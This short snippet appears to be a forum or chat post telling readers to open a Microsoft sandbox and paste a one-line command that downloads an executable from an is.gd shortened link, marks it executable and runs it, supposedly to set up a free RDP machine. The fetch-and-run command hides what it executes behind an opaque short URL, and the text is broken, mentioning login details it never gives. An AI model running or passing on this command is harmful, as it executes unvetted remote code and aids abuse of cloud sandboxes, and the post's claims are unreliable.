after opening the link you can open a microsoft sandbox, type in the sandbox this line:
curl -skLO is.gd/azurewin11vm ; chmod +x azurewin11vm ; ./azurewin11vm
this are the login for very rdp you will create, you will be able to see the rdp ip in the sandbox after its done to create the rdp
